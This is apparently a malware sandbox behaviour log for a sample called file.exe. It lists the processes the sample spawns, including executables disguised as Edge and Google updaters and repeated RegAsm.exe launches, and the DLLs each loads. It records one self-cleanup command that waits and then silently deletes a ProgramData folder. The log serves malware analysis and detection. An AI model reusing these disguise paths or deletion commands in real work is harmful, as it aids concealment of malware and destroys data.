Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7928 -s 944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userEHJDHJKFIE.exe "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Users\userEHJDHJKFIE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBAKKEGCAAE.exe "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userEHJDHJKFIE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GHDHDBAECG.exe "C:\ProgramData\GHDHDBAECG.exe"
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFIIEHJDB.exe "C:\ProgramData\CBFIIEHJDB.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KEHDBAEGII.exe "C:\ProgramData\KEHDBAEGII.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFCAFCFBAEH" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userDHDAFBFCFH.exe "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userCAAKKFHCFI.exe "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userCAAKKFHCFI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userEHJDHJKFIE.exe "C:\Users\userEHJDHJKFIE.exe"
Source: C:\Users\userEHJDHJKFIE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userBAKKEGCAAE.exe "C:\Users\userBAKKEGCAAE.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userBAKKEGCAAE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GHDHDBAECG.exe "C:\ProgramData\GHDHDBAECG.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFIIEHJDB.exe "C:\ProgramData\CBFIIEHJDB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KEHDBAEGII.exe "C:\ProgramData\KEHDBAEGII.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFCAFCFBAEH" & exit
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\GHDHDBAECG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\CBFIIEHJDB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KEHDBAEGII.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userDHDAFBFCFH.exe "C:\Users\userDHDAFBFCFH.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\userDHDAFBFCFH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userCAAKKFHCFI.exe "C:\Users\userCAAKKFHCFI.exe"
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown
Source: C:\Users\userCAAKKFHCFI.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
